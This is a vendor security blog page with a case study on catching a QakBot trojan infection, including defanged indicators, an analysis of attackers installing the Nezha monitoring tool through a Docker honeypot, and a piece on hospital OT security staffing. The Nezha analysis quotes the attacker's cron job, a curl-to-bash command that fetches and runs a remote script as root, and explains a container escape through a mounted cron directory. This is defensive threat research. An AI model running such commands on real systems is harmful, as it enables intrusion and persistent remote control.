Blog
/
Services
/
June 13, 2021

Neutralizing QakBot: Darktrace SOC's Success Story

Learn about the strategies used by Darktrace's SOC team to neutralize the QakBot banking trojan and safeguard financial data.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Brianna Luong (Leddy)
Sr. Technical Alliances Manager
Default blog image
13
Jun 2021

While cutting-edge technology is essential for organizations to secure their digital assets, having on-hand human support to deal with threats can be invaluable for lean security teams and organizations without Autonomous Response in their digital enterprise.

Cyber AI technology recently detected the QakBot banking trojan in a customer environment, and with the help of Darktrace’s SOC team, the customer was able to shut down the attack in under two hours.

QakBot malware

QakBot has built a name for itself over the past twelve years as one of the most deadly trojans in the game. Used in fast-paced, automated attacks against individual businesses, it has the ability to drain company resources and steal vast amounts of financial data. It is often downloaded during Emotet campaigns to infect devices and harvest bank account information.

Like other banking trojans, QakBot uses a dropper to install itself on a corporate device. It then self-propagates through a system and collects credentials at machine speed. Cyber-criminals can use this information to extract private data or distribute ransomware and further malicious payloads.

QakBot is extremely difficult for traditional security tools to detect. Due to a combination of its automatic worm-like capabilities, its use of a virus dropper with delayed execution, and several other obfuscation methods, it is able to bypass the majority of legacy tools and can lead to extreme financial repercussions if not dealt with in its initial stages.

The Darktrace SOC team

Darktrace’s Security Operations Center (SOC) team, located in Cambridge, San Francisco, and Singapore, deal with a wide range of these quick-moving and stealthy threats which are identified by Cyber AI, including ransomware deployments, SaaS account takeovers, and data exfiltration.

Such attacks often use ‘Living off the Land’ techniques which make them difficult to differentiate from legitimate network traffic. Moreover, many threat actors carry out malicious activities outside of a target organization’s normal working hours, amplifying the potential impact of a breach before it is discovered.

The Darktrace SOC team provides around-the-clock coverage of customer environments through Proactive Threat Notification (PTN) and Ask the Expert (ATE) services. Alongside autonomous AI detection, these services provide additional human monitoring and support for customers undergoing significant security events.

Uncovering the QakBot banking trojan

Figure 1: Timeline of the QakBot banking trojan attack, including the response from Darktrace’s services.

At a company in the EMEA region with around 7,000 devices, Cyber AI detected the early signs of a trojan horse. The organization did not have Antigena Email analyzing its email traffic in order to respond to attacks in the inbox, so when a phishing email slipped through the gateway and was opened by a user, their device began connecting to a high volume of suspicious endpoints.

This resembled command and control (C2) communication, and, based on the unusual nature of this activity for the device and the environment, this behavior triggered multiple high scoring model breaches. One of these was a high fidelity model breach for ‘Suspicious SSL Activity’, which prompted an investigation through the Proactive Threat Notification service.

Figure 2: An example of the Cyber AI Analyst incident timeline for an infected device, showing command and control and reconnaissance activity.

An expert Darktrace analyst was alerted to the unusual connectivity by the Enterprise Immune System and began to investigate the anomalous behavior, determining that this device was exhibiting strong signs of a banking trojan infection. The analyst needed to move quickly: the trojan had immediately begun reconnaissance and was preparing to spread across the network.

Within an hour, the analyst had produced a brief report summarizing the activity and this was sent as a PTN alert to the customer. The report contained key technical information from the model breach and Cyber AI Analyst incident – including the timeframe, device hostname and IP address, suspicious external domains, and a reference for the customer to view this alert in the Darktrace UI.

Figure 3: Visual example of the Darktrace threat tray. In the QakBot attack, four Enhanced Monitoring model breaches were triggered, and these were investigated and alerted through the PTN service. They were all high scoring detections, clearly indicating a compromise.

Upon receiving the alert, the customer initiated further investigation and quickly shut down the affected device. The attack was contained in less than two hours.

Ask the Expert

After their initial remediation, the company reached out to the Darktrace team via Ask the Expert to confirm that this was a QakBot infection and to gain additional assistance in investigating the extent of the compromise.

The analyst team provided ongoing support to the investigation over the next six hours, concluding that this likely came from a phishing email and that no other devices in the environment were compromised. The analyst provided a list of observed Indicators of Compromise (IoCs) and worked with the customer to add these to the Darktrace Watched Domains List for further monitoring. The customer was also able to use this list to block the IoCs at the firewall.

The organization contained the infection, and no further suspicious behavior was observed from network devices.

Humans and AI

This case study is a perfect example of how Darktrace’s services provide constant assistance to customers every day of every week. On top of Darktrace’s advanced machine learning technology, the Darktrace SOC team serves as an additional layer of support for security teams of all sizes. Proactive Threat Notifications offer an extra set of eyes on emerging threats, while Ask The Expert provides a mechanism for customers to gain investigative support directly from Darktrace analysts.

The early detection of this banking trojan allowed the organization to deal with the threat before it could develop into a serious infection or a ransomware attack. QakBot is just one of many strains of swift self-spreading malware in today’s threat landscape. Such automated attacks consistently outpace the fastest of human defenders, exposing the desperate need for AI and autonomous systems to augment human teams and protect digital systems in real time.

If Antigena Network had been active in this environment, the suspicious external connectivity would have been blocked upon first detection, stopping the attack within seconds. In fact, the customer decided to deploy Antigena Network following this incident, and now benefits from 24/7 Autonomous Response against all emerging cyber-threats.

IoCs:

nerotimethod[.]com193[.]29[.]58[.]17345[.]32[.]211[.]20754[.]36[.]108[.]120144[.]139[.]166[.]1875[.]67[.]192[.]125 149[.]28[.]101[.]9037[.]211[.]90[.]17568[.]131[.]107[.]37162[.]222[.]226[.]194mywebscrap[.]com

Darktrace model detections:

  • Compromise / SSL or HTTP Beacon
  • Compromise / Suspicious SSL Activity
  • Device / Multiple C2 Model Breaches
  • Device / Lateral Movement and C2 Activity
  • Device / Multiple Lateral Movement Model Breaches
  • Device / Large Number of Model Breaches
  • Compromise / Suspicious Beaconing Behaviour
  • Compromise / SSL Beaconing to Rare Destination
  • Compromise / Slow Beaconing Activity To External Rare
  • Compromise / High Volume of Connections with Beacon Score
  • Anomalous Connection / Suspicious Self-Signed SSL
  • Anomalous Connection / Rare External SSL Self-Signed
  • Device / Reverse DNS Sweep
  • Unusual Activity / Possible RPC Recon Activity
  • Device / Active Directory Reconnaissance
  • Device / Network Scan - Low Anomaly Score
  • Anomalous Connection / SMB Enumeration

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Brianna Luong (Leddy)
Sr. Technical Alliances Manager

More in this series

No items found.

Blog

/

Network

/

June 10, 2026

How Attackers Abuse the Chinese Nezha Monitoring Tool

nezha monitoring toolDefault blog imageDefault blog image

What is Nezha?

Nezha is an open-source tool that allows system administrators to centrally monitor multiple servers, including their resource usage such as CPU and network usage, and uptime. The tool also enables remote administrative access via an interactive shell.

The project has just under 10,000 stars on GitHub and has seen widespread adoption in the Chinese IT community, with many forum posts providing guides on installation and usage.

However, Nezha’s status as a legitimate executable that has remote access capabilities creates an opportunity for misuse. Instead of deploying a regular command-and-control (C2) implant, attackers can deploy Nezha directly on compromised hosts. As these deployments are functionally indistinguishable from legitimate installations, they can blend into expected operational tooling and evade detection.

Darktrace’s analysis of a Nezha infection

Darktrace operates several high-interaction honeypots to observe attacker techniques and behaviors. Darktrace analysts observed an intrusion against the Docker-based honeypot, initiated with a malicious container create command.

 The malicious container create command.
Figure 1: The malicious container create command.

Docker allows any host file or directory to be passed through to a container, granting read and write access. In this case, the attacker made use of this to pass through the cron.d directory, which is used to schedule recurring tasks, such as maintenance or backup commands.

These commands and timings are stored in the cron.d directory, which the attacker can now write to because it is passed through to their malicious container. By writing a job to this directory from within the container, the cron service running on the host detects the new job and executes it on the host, effectively allowing the attacker to escape the container.

The attacker the created a malicious cron job named ngk:
* * * * * root curl hxxps://file.gpu5[.]com/linux_install.sh | bash

This resulted in the host downloading and running the linux_install.sh file with root privileges.

The linux_install script installs several dependencies, sets up environmental variables, and retrieves a second-stage script (nezha_install.sh) from the same domain.

The linux_install script.
Figure 2: The linux_install script.

The nezha_install.sh script based on the official Nezha installer but has been modified to hard code configuration values, such as the server address, and to remove interactive prompts, allowing it to be installed without user input.

Open by design

One of Nezha’s most interesting design choices is that its main monitoring panel does not require authentication to view a list of monitored hosts. This exposes a list of compromised systems via the attacker-controlled panel, enabling direct observation of the operation’s scale, victimology and infrastructure.

The attacker’s Nezha dashboard.
Figure 3: The attacker’s Nezha dashboard.

At the time of analysis, the campaign had infected 141 servers, with 45 still online and accessible.  The number of online servers was previously higher, suggesting that some victims may have discovered and removed the infection.

The exposed dashboard provides insights into victim characteristics, including geographic distribution, hardware specification, and resource usage. Most infected hosts were low-spec systems, commonly one or two core Xeon CPUs and less than 4GB of RAM, indicating they were likely small virtual private servers (VPS) with limited value to the attacker.

Many systems also exhibited 100% CPU usage, which may indicate concurrent compromise, such as cryptocurrency mining activity by other threat actors.

Open-source intelligence platforms such as Shodan and Censys can also identify publicly exposed instances of Nezha. Although authentication is required to execute commands on a monitored server, visibility into dashboards still provides valuable intelligence for attackers and defenders alike.

At the time of writing, Darktrace identified 33 internet-facing Nezha installations as openly accessible.

Key takeaways

The abuse of legitimate software has become a consistent feature of modern intrusion activity, enabling attackers to operate without deploying traditional malware and reducing the risk of detection.

This creates a form of “trust inversion”, where tools typically associated with routine operations may instead indicate malicious activity when deployed outside expected contexts. Organizations should therefore prioritize asset visibility and software governance, ensuring that unexpected tool deployments can be identified and investigated, rather than focusing solely on malware-centric detection.

This challenge is especially pronounced in cloud environments, where legitimate monitoring tools may represent either essential software or an attacker backdoor. The scale and dynamic nature of cloud environments further complicate distinguishing between benign and malicious use.

Credit to Nathaniel Bill (Malware Research Engineer)
Edited by Ryan Traill (Content Manager)

Continue reading
About the author
Nathaniel Bill
Malware Research Engineer

Blog

/

OT

/

June 9, 2026

Healthcare’s OT Cybersecurity Gap: Why Hospitals Must Make the Same Security Investments as Regulated Critical Infrastructures

healthcare OTDefault blog imageDefault blog image

Rethinking the healthcare attack surface

When most people think about Operational Technology (OT) cybersecurity, they think about oil & gas pipelines, utilities, manufacturing plants, or power grids. However, hospitals & healthcare systems have quickly become a point of focus in the OT cybersecurity community as they do employ a variety of OT in the form of IoMT (Internet of Medical Things) networked devices such as: infusion pumps, imaging systems, patient monitoring equipment, laboratory systems, and traditional industrial control systems (ICS) in the form of smart building management systems (BMS) and even on site power generation control systems. 

These healthcare environments are no longer just traditional IT ecosystems, they are cyber-physical environments where disruption can directly impact patient care, operational continuity, and ultimately patient safety.

The OT cybersecurity expertise gap in healthcare organizations

Our research in the OT cybersecurity space revealed a concerning trend. Many hospitals and healthcare networks lack dedicated OT cybersecurity teams, OT security full time employees (FTE) and even OT expertise in the form of OT security certifications when compared to other critical infrastructure sectors.

On the other hand, within industries such as energy and manufacturing, we encounter more mature OT security programs that employ full time employees  dedicated to OT cybersecurity with OT security certifications and expertise to secure industrial and operational environments and lead investment in OT security processes and technology.

When reviewing the top 20 U.S. Hospitals by market cap, given what is publicly available on LinkedIn, only one FTE with an OT cybersecurity certification was found. The certifications that were searched for include: GIAC GICSP, GIAC GRID, GIAC GCIP and all ISA/IEC 62443 certifications. When replicating this same search across the top 20 utility providers in the US, 73 FTEs with OT related certifications were identified. As a control group, we looked within financial services, an industry NOT expected to have OT systems worth investing in FTEs to protect. However, the top 20 US financial institutions had 18 FTEs with OT related certifications. 

What these findings reveal

Overall, the findings regarding healthcare investment in OT security FTEs are surprising given how operationally dependent modern healthcare has become on OT. So why aren't hospitals investing in OT security personnel at the rate of peer critical infrastructures? It could just be lack of awareness; however, there are other, more plausible reasons.  

Based on historical trends in cyber incidents within the healthcare space, one could speculate that there is significantly greater likelihood of being victim to an attack that  focuses on extortion or data theft rather than an attack on specific OT systems. The amount of ransomware events incurred in healthcare, that historically do not target OT systems, may divert attention and security investment to the parts of the attack surface most likely to be targeted by ransomware. Additionally, data theft is a relevant threat objective for hospitals given PHI, PCI and PII, and data theft does not traditionally align with attacks targeting OT.  

However, with focused investment to address data theft and with adversaries new capability to string together chains of vulnerabilities of different severity scores using advancements in AI, we could be entering a threat landscape where adversaries pivot their tactics to target exposed and under protected devices and systems like OT. For example, although not a patient records database, predominant IOMT protocols HL7 and DICOM are unencrypted plaintext protocols and unless encrypted it is very simple for adversaries, who are sniffing traffic, to identify protected health information (PHI) in these communication protocols.

Why OT cybersecurity expertise can be effective for healthcare organizations

The convergence of IT, OT, and IoMT is already here, and threat actors are increasingly aware of the operational vulnerabilities that come with it. Additionally, as AI solutions such as agentic or generative applications are adopted and deployed, the attack surface will continue to change as permissions, and new connections will exist to support AI efficiency. From a cybersecurity standpoint, the reality is that many healthcare organizations are still working to establish consistent visibility and governance across their enterprise-connected devices and systems as their attack surface is changing in real time.  As the healthcare sector remains a significant target for cyber-attacks, hospitals would be well advised to begin addressing their operational environments OT as a critical component of their attack surface and invest in securing them first with people, then process and technology. 

What can healthcare organizations do to secure their OT

Including OT in current cybersecurity processes such as red teaming and testing incident response plans that take OT into account alongside building dedicated OT security capabilities including improving OT network visibility, leveraging OT network anomaly detection, micro-segmentation, and secure remote access will become essential steps in strengthening healthcare resilience. 

However, before any of the above processes or investments in technology can be made, these healthcare organizations, like the other critical infrastructure sectors, need to invest in the people with the experience in OT security to lead, implement, manage and audit the investment in OT cybersecurity technology and processes.  In cases where headcount cannot be added, investment in OT security certifications, such as the ones listed in this article, and participation on OT security events focused on practitioner training for existing cybersecurity employees can move the needle in terms of bringing OT expertise to the existing team.  

In an industry where uptime and safety are as mission critical as they are for a power utility, OT cybersecurity FTEs can no longer be viewed as optional for healthcare organizations and must become part of the foundation of modern healthcare cybersecurity strategy. 

[related-resource]

Continue reading
About the author
Daniel Simonds
Director of Operational Technology
Your data. Our AI.
Elevate your network security with Darktrace AI